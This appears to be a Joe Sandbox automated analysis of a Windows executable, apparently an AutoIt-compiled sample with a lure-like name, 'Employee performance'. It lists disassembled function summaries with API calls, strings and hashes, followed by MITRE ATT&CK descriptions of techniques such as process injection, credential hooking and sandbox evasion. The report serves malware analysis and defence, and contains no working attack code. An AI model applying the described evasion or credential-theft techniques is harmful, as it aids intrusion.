Instruction ID: 78e9e37e246de2ed616550a12d5f843f12cbc563380a6d99c1161c9a2981b378
Opcode Fuzzy Hash: c5aa6b000b87ce6d376617803f54bc63139999bdfb93ff4b1f6c0dfd803b240c
Instruction Fuzzy Hash: 0C1106B12026317BE7786A668D84EE7BEACEF026A4F00422AB1C983080D3759440C6F0

Function 01063429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 010634AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010634BA

Strings

edit, xrefs: 0106348F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 8e88538d751e03edf3a33c057393ed528c1df47572925ff370f4b9a076ee442c
Instruction ID: 06b7080dae4719a3b0b6a3d17808dcb6dc14b822241334272673d0058fdb69d0
Opcode Fuzzy Hash: 8e88538d751e03edf3a33c057393ed528c1df47572925ff370f4b9a076ee442c
Instruction Fuzzy Hash: 9011B275100104ABEB624E68DC44AEB77AEFF05374F504314F9E89B1D4CB75EC519790

Function 01036C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

CharUpperBuffW.USER32(?,?,?), ref: 01036CB6
_wcslen.LIBCMT ref: 01036CC2

Strings

STOP, xrefs: 01036CBC, 01036CC1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: c27972536f8ad7846dd25a27fef1bde6b2ce1f27ac26d235ebc3d767077fe182
Instruction ID: 960dcd8978e8cf357e70fd57faf32659b876aa30154f9aeff6403499b792b72a
Opcode Fuzzy Hash: c27972536f8ad7846dd25a27fef1bde6b2ce1f27ac26d235ebc3d767077fe182
Instruction Fuzzy Hash: BC010832E1052A9ACB21AFFDDC448BF77F9EA91614B000565E49296195EA37D640C750

Function 01031CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 01033CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01033CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01031D4C

Strings

ListBox, xrefs: 01031D16
ComboBox, xrefs: 01031CEB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: cfd6d3ab82d5f6db84c873985e60766f5a6ec24881753a5b52f270614550c89b
Instruction ID: 7eb65ae739bac252bfb5e4362b5a2ea2334261254b9938262f13ab70fa0dc5b5
Opcode Fuzzy Hash: cfd6d3ab82d5f6db84c873985e60766f5a6ec24881753a5b52f270614550c89b
Instruction Fuzzy Hash: 2D012431600229AB9B08FBA4CC54CFE77ADFB9B350B44061AF8B25B3C0EA7458089760

Function 01031BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 01033CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01033CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 01031C46

Strings

ListBox, xrefs: 01031C10
ComboBox, xrefs: 01031BE5

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ad77f1ce5a5afa618a62972c14921a686935dd3d90f210694c92ad1792db30a3
Instruction ID: 563697851b7a4acaf70ba6249909281b05f5c56bedeab94490279645a306ec2e
Opcode Fuzzy Hash: ad77f1ce5a5afa618a62972c14921a686935dd3d90f210694c92ad1792db30a3
Instruction Fuzzy Hash: 2C01477171010D66DF04EBE2CE519FF77ED9B56340F04001AB49267281EA74AE0897B1

Function 01031C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 01033CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01033CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 01031CC8

Strings

ListBox, xrefs: 01031C94
ComboBox, xrefs: 01031C69

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 2c330cc9a0ba6b777744399cfc394ebbdfe437ecd69eaaa4bb615e8260ae1a4b
Instruction ID: d7ef093abf0e493ed38da9c99dc941fef1a1500b4953c4e79ad1c0ba666c9271
Opcode Fuzzy Hash: 2c330cc9a0ba6b777744399cfc394ebbdfe437ecd69eaaa4bb615e8260ae1a4b
Instruction Fuzzy Hash: 2401267171011D67DF04EBE5DE11AFF77ECAB65340F04002AB88267281EA749E08D771

Function 01031D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 01033CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01033CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01031DD3

Strings

ListBox, xrefs: 01031DA0
ComboBox, xrefs: 01031D75

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6fd57bb43b4ee2b12900f0a85e446413e69a419c665ccb29cdd157c07cc1b82a
Instruction ID: bb19a0d1160db926fc4a7bdb5b8313831591d0608686b790aff16cc1552028ca
Opcode Fuzzy Hash: 6fd57bb43b4ee2b12900f0a85e446413e69a419c665ccb29cdd157c07cc1b82a
Instruction Fuzzy Hash: 12F04F30B1022966DB04F7E5DC95AFF77ACAF46340F08080AB8A2672C0EAB4590892A0

Function 0105747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01057493
_wcslen.LIBCMT ref: 010574B9

Strings

3, 3, 16, 1, xrefs: 01057483

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 2bb586554f33403a0af5991ddeab46a70cdd7021613e2800ca60b4497247c158
Instruction ID: c7834f9832c7fe5ae35c83dc12b96ef683d21a08dfcd2429d0f8057c0e3bc97d
Opcode Fuzzy Hash: 2bb586554f33403a0af5991ddeab46a70cdd7021613e2800ca60b4497247c158
Instruction Fuzzy Hash: 2BE0E5023112201093B1127A9CC197F7EC9CFC5650794182EFEC5C2266EF98DD91B3A0

Function 01030B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01030B23

Strings

Error allocating memory., xrefs: 01030B1C
AutoIt, xrefs: 01030B17

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 97cbe9d0eef67d359d9af90b7e13aa54d0ff412e14bc83674f5094ee3452745a
Instruction ID: 6eead795e3612027ea779cc3ef8643bab27495dc083cfdc098e13e687c59f56d
Opcode Fuzzy Hash: 97cbe9d0eef67d359d9af90b7e13aa54d0ff412e14bc83674f5094ee3452745a
Instruction Fuzzy Hash: 15E0D83124434C36E32436567D03F897A888F05F20F10442BF7D8995C38ADA245022A9

Function 00FF0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FEF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FF0D71,?,?,?,00FD100A), ref: 00FEF7CE

IsDebuggerPresent.KERNEL32(?,?,?,00FD100A), ref: 00FF0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FD100A), ref: 00FF0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FF0D7F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: a70f140f35858573a67155f0e4c1b70fe5bdc0166f821d53d6593278f35603c6
Instruction ID: f55ddc6e0259c8ac388cbdf8b67a97e2262a00fa348e7481cb837b88ed893b51
Opcode Fuzzy Hash: a70f140f35858573a67155f0e4c1b70fe5bdc0166f821d53d6593278f35603c6
Instruction Fuzzy Hash: C1E092742007528BE3309FB9E90875A7BE4AF04B44F04892DE9C6C7756DFBAE4449B91

Function 0102D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0102D220

Strings

X64, xrefs: 0102D2A8
%.3d, xrefs: 0102D22B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 91d265535195b94fcfe945213ff31ebc3e5145c4d863809d88d0025aaecc6f35
Instruction ID: c2605fdff3a6a12a798048c8cc77502039c16bb4c3b68affc619abf43114d398
Opcode Fuzzy Hash: 91d265535195b94fcfe945213ff31ebc3e5145c4d863809d88d0025aaecc6f35
Instruction Fuzzy Hash: BED01271804129E9DB5096E1CC459BDB37CAB69211F40C452F986D1000D628C90C9B61

Function 01062322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0106232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0106233F

Part of subcall function 0103E97B: Sleep.KERNEL32 ref: 0103E9F3

Strings

Shell_TrayWnd, xrefs: 01062325

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5b64c25f4ae78e2588b92b7cd2d8c77b671507061dc3c6a744c021c29acf0103
Instruction ID: 065754b167a40f88ba17c41289aaddedee89bb37441931858c097f6eabfae5fa
Opcode Fuzzy Hash: 5b64c25f4ae78e2588b92b7cd2d8c77b671507061dc3c6a744c021c29acf0103
Instruction Fuzzy Hash: F0D02232390300B7FA74B330EC0FFCABA08AB04B00F000A06B3C6AA1D4C9F5A800CB04

Function 01062356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0106236C
PostMessageW.USER32(00000000), ref: 01062373

Part of subcall function 0103E97B: Sleep.KERNEL32 ref: 0103E9F3

Strings

Shell_TrayWnd, xrefs: 01062365

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 962dba05881bdfb36587e7609565c75362cecdb4c829e92382bd813e88f8a68e
Instruction ID: fa14ebe6dda5564a093d81f50c0751174b859044498ac8e2ce33a0ff10faeef6
Opcode Fuzzy Hash: 962dba05881bdfb36587e7609565c75362cecdb4c829e92382bd813e88f8a68e
Instruction Fuzzy Hash: 26D0C73139131176F6747671DD0EFC675145754710F004516B6C5991D4D5B568418754

Function 0100BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0100BE93
GetLastError.KERNEL32 ref: 0100BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0100BEFC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: bab199c16eb2a2156af3ee7202441b0a57e9915ce419fae056258cc4f4cc603d
Instruction ID: bc403a280f34f076900621885b3f4e1979b6eca2cabfbe7435821262d6cd359e
Opcode Fuzzy Hash: bab199c16eb2a2156af3ee7202441b0a57e9915ce419fae056258cc4f4cc603d
Instruction Fuzzy Hash: A741B738604646AFFB738F68C844ABA7BE5AF41710F1441ADFAD9971E1DB328901CB60

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

